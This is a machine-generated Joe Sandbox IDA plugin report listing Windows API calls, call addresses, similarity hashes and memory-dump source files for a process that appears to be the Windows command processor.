Similarity
• API ID: Time$File$DateFormatSystem$realloc$DefaultInfoLocalLocaleUsermemmove
• String ID: %02d%s%02d%s%02d$%s $%s %s
• API String ID: 2927284792-4023967598
• Opcode ID: 91abf7cfe3e7ce116800c9ffe160880b899db2fa4078371fbf9914c7c1103a91
• Instruction ID: eaf096dd26ca8b6bd2be4b9ed6331f9160ead8b02ae9a02658b5ceafff2b8d4c
• Opcode Fuzzy Hash: 91abf7cfe3e7ce116800c9ffe160880b899db2fa4078371fbf9914c7c1103a91
• Instruction Fuzzy Hash: 02C1F671A002259BDB24DF64DC49AEF77B8EF46300F5441AAE90AE7141EB359EC0CF51
APIs
• memset.MSVCRT ref: 00024F03
  • Part of subcall function 0001E3F0: memset.MSVCRT ref: 0001E455
• FindFirstFileW.API-MS-WIN-CORE-FILE-L1-1-0(?,?,-00000001), ref: 00024F67
• FindClose.API-MS-WIN-CORE-FILE-L1-1-0(00000000,?,?,-00000001), ref: 00024F77
• FindFirstFileW.API-MS-WIN-CORE-FILE-L1-1-0(?,?,00012670,?,?,?,-00000001), ref: 00024FEB
• FindNextFileW.API-MS-WIN-CORE-FILE-L1-1-0(?,?,?,?,?,?,-00000001), ref: 00025103
• FindClose.API-MS-WIN-CORE-FILE-L1-1-0(?,?,?,?,-00000001), ref: 0002511E
• ??_V@YAXPAX@Z.MSVCRT(?,-00000001), ref: 00025141
Strings
Memory Dump Source
• Source File: 0000000D.00000002.1558521903.0000000000011000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00010000, based on PE: true
• Associated: 0000000D.00000002.1558485603.0000000000010000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 0000000D.00000002.1558554013.000000000003E000.00000004.00000001.01000000.0000000B.sdmp
• Associated: 0000000D.00000002.1558587325.000000000005A000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 0000000D.00000002.1558587325.000000000005E000.00000002.00000001.01000000.0000000B.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_13_2_10000_alpha.jbxd
Similarity
• API ID: Find$File$CloseFirstmemset$Next
• String ID: \\?\
• API String ID: 3059144641-4282027825
• Opcode ID: fbc856f9da526bab2457c07e193bf77342a100c51651d9fc3de90548586eaf21
• Instruction ID: 5bd50ec6915b1dd399efcc97ed3c90da32e05ca59e796b9204eb01fab1d60d03
• Opcode Fuzzy Hash: fbc856f9da526bab2457c07e193bf77342a100c51651d9fc3de90548586eaf21
• Instruction Fuzzy Hash: C2E13571A002299BDB34DBA8EC95BFEB3F8EF54301F4405A9E909D7181EB359E81CB54
APIs
• GetFileAttributesW.API-MS-WIN-CORE-FILE-L1-1-0(?,?,00000000,00000002), ref: 0001539C
Memory Dump Source
• Source File: 0000000D.00000002.1558521903.0000000000011000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00010000, based on PE: true
• Associated: 0000000D.00000002.1558485603.0000000000010000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 0000000D.00000002.1558554013.000000000003E000.00000004.00000001.01000000.0000000B.sdmp
• Associated: 0000000D.00000002.1558587325.000000000005A000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 0000000D.00000002.1558587325.000000000005E000.00000002.00000001.01000000.0000000B.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_13_2_10000_alpha.jbxd
Similarity
• API ID: AttributesFile
• String ID:
• API String ID: 3188754299-0
• Opcode ID: f2e9faeefc3ea5210fd4a160cbb17a42ee1a6b31c4e806e6dd3834f1105b19bd
• Instruction ID: 1f6ea9af001d2496e1dce12521e95d44e06afa75d73c9781a8bb43f428f597b0
• Opcode Fuzzy Hash: f2e9faeefc3ea5210fd4a160cbb17a42ee1a6b31c4e806e6dd3834f1105b19bd
• Instruction Fuzzy Hash: 08A10271A002268BDB64EF64EC85AFEB3F5EF54310F5445ADE94AD7280EB319E81CB50
                                                                                                                                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                                                                                                                                          • EnterCriticalSection.API-MS-WIN-CORE-SYNCH-L1-1-0(25170B64,00000000,?), ref: 00037710
                                                                                                                                                                                                                                                                                                                                                                                                                          • LeaveCriticalSection.API-MS-WIN-CORE-SYNCH-L1-1-0 ref: 00037722
                                                                                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 0001EC2E: GetEnvironmentVariableW.API-MS-WIN-CORE-PROCESSENVIRONMENT-L1-1-0(?,0003E590,00002000,?,00058BF0,00000000,?,?,00018F0D), ref: 0001EC51
                                                                                                                                                                                                                                                                                                                                                                                                                          • towupper.MSVCRT ref: 000378BC
                                                                                                                                                                                                                                                                                                                                                                                                                          • LocalFree.API-MS-WIN-CORE-HEAP-L2-1-0(00000000,?,?,?,?,?,?,?,?,?,?,?), ref: 000379F1
                                                                                                                                                                                                                                                                                                                                                                                                                          • GetDriveTypeW.API-MS-WIN-CORE-FILE-L1-1-0(?,00011F8C,00013B98), ref: 00037B15
                                                                                                                                                                                                                                                                                                                                                                                                                          • EnterCriticalSection.API-MS-WIN-CORE-SYNCH-L1-1-0(00000000,25170B64,00000000,?), ref: 00037D0D
                                                                                                                                                                                                                                                                                                                                                                                                                          • LeaveCriticalSection.API-MS-WIN-CORE-SYNCH-L1-1-0 ref: 00037D20
                                                                                                                                                                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                                                          • Source File: 0000000D.00000002.1558521903.0000000000011000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00010000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 0000000D.00000002.1558485603.0000000000010000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 0000000D.00000002.1558554013.000000000003E000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 0000000D.00000002.1558587325.000000000005A000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 0000000D.00000002.1558587325.000000000005E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_13_2_10000_alpha.jbxd
                                                                                                                                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                          • API ID: CriticalSection$EnterLeave$DriveEnvironmentFreeLocalTypeVariabletowupper
                                                                                                                                                                                                                                                                                                                                                                                                                          • String ID: %s $%s>$PROMPT$Unknown
                                                                                                                                                                                                                                                                                                                                                                                                                          • API String ID: 708651206-3050974680
                                                                                                                                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 0003C135: GetFullPathNameW.API-MS-WIN-CORE-FILE-L1-1-0(?,00000000,00000000,?), ref: 0003C14E
                                                                                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 0003C135: SetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0(00000008,?,00000000,00000000,?), ref: 0003C16A
                                                                                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 0003C135: GetFullPathNameW.API-MS-WIN-CORE-FILE-L1-1-0(?,00000000,00000000,?,?,00000000,00000000,?), ref: 0003C17B
                                                                                                                                                                                                                                                                                                                                                                                                                          • SetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0(40002749,00000001), ref: 0003C24F
                                                                                                                                                                                                                                                                                                                                                                                                                          • CreateDirectoryW.API-MS-WIN-CORE-FILE-L1-1-0(00000000,00000000,00000001), ref: 0003C270
                                                                                                                                                                                                                                                                                                                                                                                                                          • CreateFileW.API-MS-WIN-CORE-FILE-L1-1-0(00000000,40000000,00000001,00000000,00000003,02000000,00000000), ref: 0003C293
                                                                                                                                                                                                                                                                                                                                                                                                                          • RtlDosPathNameToNtPathName_U.NTDLL(00000000,?,00000000,00000000), ref: 0003C2AE
                                                                                                                                                                                                                                                                                                                                                                                                                          • memset.MSVCRT ref: 0003C2EF
                                                                                                                                                                                                                                                                                                                                                                                                                          • memcpy.MSVCRT(?,?,?), ref: 0003C324
                                                                                                                                                                                                                                                                                                                                                                                                                          • memcpy.MSVCRT(?,00000000,?), ref: 0003C370
                                                                                                                                                                                                                                                                                                                                                                                                                          • NtFsControlFile.NTDLL(?,00000000,00000000,00000000,?,000900A4,?,?,00000000,00000000), ref: 0003C392
                                                                                                                                                                                                                                                                                                                                                                                                                          • RtlNtStatusToDosError.NTDLL ref: 0003C39D
                                                                                                                                                                                                                                                                                                                                                                                                                          • SetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0(00000000), ref: 0003C3A4
                                                                                                                                                                                                                                                                                                                                                                                                                          • CloseHandle.API-MS-WIN-CORE-HANDLE-L1-1-0(?), ref: 0003C3B6
                                                                                                                                                                                                                                                                                                                                                                                                                          • RtlFreeHeap.NTDLL(?,00000000,00000000), ref: 0003C3D1
                                                                                                                                                                                                                                                                                                                                                                                                                          • RemoveDirectoryW.API-MS-WIN-CORE-FILE-L1-1-0(00000000), ref: 0003C3E2
                                                                                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 0003C5F2: memset.MSVCRT ref: 0003C62E
                                                                                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 0003C5F2: memset.MSVCRT ref: 0003C656
                                                                                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 0003C5F2: GetVolumePathNameW.API-MS-WIN-CORE-FILE-L1-1-0(00000000,?,?,-00000105,-00000105,?,?,?,00000001,00000000,00000000), ref: 0003C6C7
                                                                                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 0003C5F2: GetDriveTypeW.API-MS-WIN-CORE-FILE-L1-1-0(?,?,?,?,00000001,00000000,00000000), ref: 0003C6E6
                                                                                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 0003C5F2: GetVolumeInformationW.API-MS-WIN-CORE-FILE-L1-1-0(?,00000000,00000000,00000000,?,?,?,00000001,?,?,?,00000001,00000000,00000000), ref: 0003C72A
                                                                                                                                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                                                          • Source File: 0000000D.00000002.1558521903.0000000000011000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00010000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 0000000D.00000002.1558485603.0000000000010000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 0000000D.00000002.1558554013.000000000003E000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 0000000D.00000002.1558587325.000000000005A000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 0000000D.00000002.1558587325.000000000005E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_13_2_10000_alpha.jbxd
                                                                                                                                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                          • API ID: Path$ErrorName$Lastmemset$CreateDirectoryFileFullVolumememcpy$CloseControlDriveFreeHandleHeapInformationName_RemoveStatusType
                                                                                                                                                                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                                                                                                                                                                          • API String ID: 223857506-0
                                                                                                                                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                                                                                                                                          • GetSystemTime.API-MS-WIN-CORE-SYSINFO-L1-1-0(?,0003E590,?,00002000), ref: 00019342
                                                                                                                                                                                                                                                                                                                                                                                                                          • SystemTimeToFileTime.API-MS-WIN-CORE-TIMEZONE-L1-1-0(?,?), ref: 00019356
                                                                                                                                                                                                                                                                                                                                                                                                                          • FileTimeToLocalFileTime.API-MS-WIN-CORE-FILE-L1-1-0(?,?), ref: 0001936A
                                                                                                                                                                                                                                                                                                                                                                                                                          • FileTimeToSystemTime.API-MS-WIN-CORE-TIMEZONE-L1-1-0(?,?), ref: 0001937E
                                                                                                                                                                                                                                                                                                                                                                                                                          • GetLocaleInfoW.API-MS-WIN-CORE-LOCALIZATION-L1-2-0(00000000,00001003,?,00000080), ref: 0002BC07
                                                                                                                                                                                                                                                                                                                                                                                                                          • GetTimeFormatW.API-MS-WIN-CORE-DATETIME-L1-1-0(00000000,00000002,?,?,?,00000020), ref: 0002BD31
                                                                                                                                                                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                                                          • Source File: 0000000D.00000002.1558521903.0000000000011000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00010000, based on PE: true
• Associated: 0000000D.00000002.1558485603.0000000000010000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 0000000D.00000002.1558554013.000000000003E000.00000004.00000001.01000000.0000000B.sdmp
• Associated: 0000000D.00000002.1558587325.000000000005A000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 0000000D.00000002.1558587325.000000000005E000.00000002.00000001.01000000.0000000B.sdmp
                                                                                                                                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_13_2_10000_alpha.jbxd
                                                                                                                                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                          • API ID: Time$File$System$FormatInfoLocalLocale
                                                                                                                                                                                                                                                                                                                                                                                                                          • String ID: %02d%s%02d%s$%2d%s%02d%s%02d%s%02d$HH:mm:ss t
                                                                                                                                                                                                                                                                                                                                                                                                                          • API String ID: 55602301-2516506544
                                                                                                                                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                                                                                                                                          • FindFirstFileExW.API-MS-WIN-CORE-FILE-L1-1-0(00000000,00000000,?,00000000,00000000,00000002,00000000,00000000,?,000259D0,?,00016054,-00001038,00000000,?,?), ref: 000258BB
                                                                                                                                                                                                                                                                                                                                                                                                                          • GetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0(?,000259D0,?,00016054,-00001038,00000000,?,?,00000000,00000000,-00000001), ref: 000258CD
                                                                                                                                                                                                                                                                                                                                                                                                                          • GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(00000000,00000014,?,000259D0,?,00016054,-00001038,00000000,?,?,00000000,00000000,-00000001), ref: 00025944
                                                                                                                                                                                                                                                                                                                                                                                                                          • HeapAlloc.API-MS-WIN-CORE-HEAP-L1-1-0(00000000,?,000259D0,?,00016054,-00001038,00000000,?,?,00000000,00000000,-00000001), ref: 0002594B
                                                                                                                                                                                                                                                                                                                                                                                                                          • GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(00000000,?,00000000,?,000259D0,?,00016054,-00001038,00000000,?,?,00000000,00000000,-00000001), ref: 0002596C
                                                                                                                                                                                                                                                                                                                                                                                                                          • HeapReAlloc.API-MS-WIN-CORE-HEAP-L1-1-0(00000000,?,000259D0,?,00016054,-00001038,00000000,?,?,00000000,00000000,-00000001), ref: 00025973
                                                                                                                                                                                                                                                                                                                                                                                                                          • FindNextFileW.API-MS-WIN-CORE-FILE-L1-1-0(00000000,?,?,000259D0,?,00016054,-00001038,00000000,?,?,00000000,00000000,-00000001), ref: 0002598F
                                                                                                                                                                                                                                                                                                                                                                                                                          • FindClose.API-MS-WIN-CORE-FILE-L1-1-0(?,?,000259D0,?,00016054,-00001038,00000000,?,?,00000000,00000000,-00000001), ref: 000259B6
                                                                                                                                                                                                                                                                                                                                                                                                                          • GetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0(?,000259D0,?,00016054,-00001038,00000000,?,?,00000000,00000000,-00000001), ref: 0003160B
                                                                                                                                                                                                                                                                                                                                                                                                                          • FindClose.API-MS-WIN-CORE-FILE-L1-1-0(?,?,000259D0,?,00016054,-00001038,00000000,?,?,00000000,00000000,-00000001), ref: 00031618
                                                                                                                                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                                                          • Source File: 0000000D.00000002.1558521903.0000000000011000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00010000, based on PE: true
• Associated: 0000000D.00000002.1558485603.0000000000010000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 0000000D.00000002.1558554013.000000000003E000.00000004.00000001.01000000.0000000B.sdmp
• Associated: 0000000D.00000002.1558587325.000000000005A000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 0000000D.00000002.1558587325.000000000005E000.00000002.00000001.01000000.0000000B.sdmp
                                                                                                                                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_13_2_10000_alpha.jbxd
                                                                                                                                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                          • API ID: FindHeap$AllocCloseErrorFileLastProcess$FirstNext
                                                                                                                                                                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                                                                                                                                                                          • API String ID: 3609286125-0
                                                                                                                                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                                                                                                                                          • RtlDosPathNameToRelativeNtPathName_U_WithStatus.NTDLL ref: 00024782
                                                                                                                                                                                                                                                                                                                                                                                                                          • NtOpenFile.NTDLL(000000FF,00010000,?,?,00000004,00005040), ref: 000247D4
                                                                                                                                                                                                                                                                                                                                                                                                                          • RtlReleaseRelativeName.NTDLL(?), ref: 000247E0
                                                                                                                                                                                                                                                                                                                                                                                                                          • RtlFreeUnicodeString.NTDLL(?), ref: 000247EA
                                                                                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 00024823: NtQueryVolumeInformationFile.NTDLL ref: 0002484F
                                                                                                                                                                                                                                                                                                                                                                                                                          • CloseHandle.API-MS-WIN-CORE-HANDLE-L1-1-0(000000FF), ref: 0002480E
                                                                                                                                                                                                                                                                                                                                                                                                                          • DeleteFileW.API-MS-WIN-CORE-FILE-L1-1-0(?,?,?,00000001), ref: 0003096F
                                                                                                                                                                                                                                                                                                                                                                                                                          • GetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0 ref: 0003097D
                                                                                                                                                                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                                                          • Source File: 0000000D.00000002.1558521903.0000000000011000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00010000, based on PE: true
• Associated: 0000000D.00000002.1558485603.0000000000010000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 0000000D.00000002.1558554013.000000000003E000.00000004.00000001.01000000.0000000B.sdmp
• Associated: 0000000D.00000002.1558587325.000000000005A000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 0000000D.00000002.1558587325.000000000005E000.00000002.00000001.01000000.0000000B.sdmp
                                                                                                                                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_13_2_10000_alpha.jbxd
                                                                                                                                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                          • API ID: File$NamePathRelative$CloseDeleteErrorFreeHandleInformationLastName_OpenQueryReleaseStatusStringUnicodeVolumeWith
                                                                                                                                                                                                                                                                                                                                                                                                                          • String ID: @
                                                                                                                                                                                                                                                                                                                                                                                                                          • API String ID: 2968197161-2766056989
                                                                                                                                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                                                                                                                                          • EnterCriticalSection.API-MS-WIN-CORE-SYNCH-L1-1-0 ref: 00037483
                                                                                                                                                                                                                                                                                                                                                                                                                          • LeaveCriticalSection.API-MS-WIN-CORE-SYNCH-L1-1-0 ref: 00037495
                                                                                                                                                                                                                                                                                                                                                                                                                          • fprintf.MSVCRT ref: 000374BB
                                                                                                                                                                                                                                                                                                                                                                                                                          • fflush.MSVCRT ref: 000374C9
                                                                                                                                                                                                                                                                                                                                                                                                                          • TryAcquireSRWLockExclusive.API-MS-WIN-CORE-SYNCH-L1-1-0(00058E04), ref: 000374E2
                                                                                                                                                                                                                                                                                                                                                                                                                          • NtCancelSynchronousIoFile.NTDLL(00000000,00000000), ref: 000374F8
                                                                                                                                                                                                                                                                                                                                                                                                                          • ReleaseSRWLockExclusive.API-MS-WIN-CORE-SYNCH-L1-1-0(00058E04), ref: 000374FF
                                                                                                                                                                                                                                                                                                                                                                                                                          • _get_osfhandle.MSVCRT ref: 0003751C
                                                                                                                                                                                                                                                                                                                                                                                                                          • FlushConsoleInputBuffer.API-MS-WIN-CORE-CONSOLE-L2-1-0(00000000), ref: 00037524
                                                                                                                                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                          • API ID: CriticalExclusiveLockSection$AcquireBufferCancelConsoleEnterFileFlushInputLeaveReleaseSynchronous_get_osfhandlefflushfprintf
                                                                                                                                                                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                                                                                                                                                                          • API String ID: 3139166086-0
                                                                                                                                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                                                                                                                                          • _setjmp3.MSVCRT ref: 00014E78
                                                                                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 00018E9E: GetCurrentDirectoryW.API-MS-WIN-CORE-PROCESSENVIRONMENT-L1-1-0(?,00058BF0,00000000,?), ref: 00018EC3
                                                                                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 0001DCD0: GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(00000008,?,?,0001ACD8,00000001,?,00000000,00018C23,-00000105,0003C9B0,00000240,00021E92,00000000,00000000,0002ACE0,00000000), ref: 0001DCE1
                                                                                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 0001DCD0: HeapAlloc.API-MS-WIN-CORE-HEAP-L1-1-0(00000000,?,0001ACD8,00000001,?,00000000,00018C23,-00000105,0003C9B0,00000240,00021E92,00000000,00000000,0002ACE0,00000000,00000000), ref: 0001DCE8
                                                                                                                                                                                                                                                                                                                                                                                                                          • NtQueryInformationProcess.NTDLL ref: 00014F28
                                                                                                                                                                                                                                                                                                                                                                                                                          • NtSetInformationProcess.NTDLL ref: 00014F46
                                                                                                                                                                                                                                                                                                                                                                                                                          • NtSetInformationProcess.NTDLL ref: 00014FAE
                                                                                                                                                                                                                                                                                                                                                                                                                          • longjmp.MSVCRT(00050A30,00000001,00000000), ref: 000291C8
                                                                                                                                                                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                          • API ID: Process$Information$Heap$AllocCurrentDirectoryQuery_setjmp3longjmp
                                                                                                                                                                                                                                                                                                                                                                                                                          • String ID: %9d$P,Fw
                                                                                                                                                                                                                                                                                                                                                                                                                          • API String ID: 4212706909-3698535272
                                                                                                                                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 00021D90: _wcsnicmp.MSVCRT ref: 00021E14
                                                                                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 0001BC30: wcschr.MSVCRT ref: 0001BCA7
                                                                                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 0001BC30: iswspace.MSVCRT ref: 0001BD1D
                                                                                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 0001BC30: wcschr.MSVCRT ref: 0001BD39
                                                                                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 0001BC30: wcschr.MSVCRT ref: 0001BD5D
                                                                                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 00024BAF: _wcsnicmp.MSVCRT ref: 00024C1A
                                                                                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 00024BAF: _wcsnicmp.MSVCRT ref: 00030B39
                                                                                                                                                                                                                                                                                                                                                                                                                          • memset.MSVCRT ref: 00024975
                                                                                                                                                                                                                                                                                                                                                                                                                          • SetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0(00000000,?,00000000,-00000001,00000000,-00000001,00000104,00000000,00000001), ref: 00024ABC
                                                                                                                                                                                                                                                                                                                                                                                                                          • GetFileAttributesW.API-MS-WIN-CORE-FILE-L1-1-0(?), ref: 00024AF4
                                                                                                                                                                                                                                                                                                                                                                                                                          • GetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0 ref: 00024AFF
                                                                                                                                                                                                                                                                                                                                                                                                                          • ??_V@YAXPAX@Z.MSVCRT(?,00000000), ref: 00024B28
                                                                                                                                                                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                                                          • Source File: 0000000D.00000002.1558521903.0000000000011000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00010000, based on PE: true
• Associated: 0000000D.00000002.1558485603.0000000000010000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 0000000D.00000002.1558554013.000000000003E000.00000004.00000001.01000000.0000000B.sdmp
• Associated: 0000000D.00000002.1558587325.000000000005A000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 0000000D.00000002.1558587325.000000000005E000.00000002.00000001.01000000.0000000B.sdmp
                                                                                                                                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_13_2_10000_alpha.jbxd
                                                                                                                                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                          • API ID: _wcsnicmpwcschr$ErrorLast$AttributesFileiswspacememset
                                                                                                                                                                                                                                                                                                                                                                                                                          • String ID: COPYCMD
                                                                                                                                                                                                                                                                                                                                                                                                                          • API String ID: 1068965577-3727491224
                                                                                                                                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                                                                                                                                          • memset.MSVCRT ref: 00017A9C
                                                                                                                                                                                                                                                                                                                                                                                                                          • memset.MSVCRT ref: 00017AC7
                                                                                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 0001E3F0: memset.MSVCRT ref: 0001E455
                                                                                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 0001DCD0: GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(00000008,?,?,0001ACD8,00000001,?,00000000,00018C23,-00000105,0003C9B0,00000240,00021E92,00000000,00000000,0002ACE0,00000000), ref: 0001DCE1
                                                                                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 0001DCD0: HeapAlloc.API-MS-WIN-CORE-HEAP-L1-1-0(00000000,?,0001ACD8,00000001,?,00000000,00018C23,-00000105,0003C9B0,00000240,00021E92,00000000,00000000,0002ACE0,00000000,00000000), ref: 0001DCE8
                                                                                                                                                                                                                                                                                                                                                                                                                          • ??_V@YAXPAX@Z.MSVCRT(?,00007FE9,?,?,?,?,00000000,?), ref: 00017BCA
                                                                                                                                                                                                                                                                                                                                                                                                                          • ??_V@YAXPAX@Z.MSVCRT(?,00007FE9,?,?,?,?,00000000,?), ref: 00017BDC
                                                                                                                                                                                                                                                                                                                                                                                                                          • longjmp.MSVCRT(00050A30,00000001,00007FE9,00007FE9,?,?,?,?,00000000,?), ref: 0002AE5B
                                                                                                                                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                                                          • Source File: 0000000D.00000002.1558521903.0000000000011000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00010000, based on PE: true
• Associated: 0000000D.00000002.1558485603.0000000000010000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 0000000D.00000002.1558554013.000000000003E000.00000004.00000001.01000000.0000000B.sdmp
• Associated: 0000000D.00000002.1558587325.000000000005A000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 0000000D.00000002.1558587325.000000000005E000.00000002.00000001.01000000.0000000B.sdmp
                                                                                                                                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_13_2_10000_alpha.jbxd
                                                                                                                                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                          • API ID: memset$Heap$AllocProcesslongjmp
                                                                                                                                                                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                                                                                                                                                                          • API String ID: 2656838167-0
                                                                                                                                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                                                          • Source File: 0000000D.00000002.1558521903.0000000000011000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00010000, based on PE: true
• Associated: 0000000D.00000002.1558485603.0000000000010000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 0000000D.00000002.1558554013.000000000003E000.00000004.00000001.01000000.0000000B.sdmp
• Associated: 0000000D.00000002.1558587325.000000000005A000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 0000000D.00000002.1558587325.000000000005E000.00000002.00000001.01000000.0000000B.sdmp
                                                                                                                                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_13_2_10000_alpha.jbxd
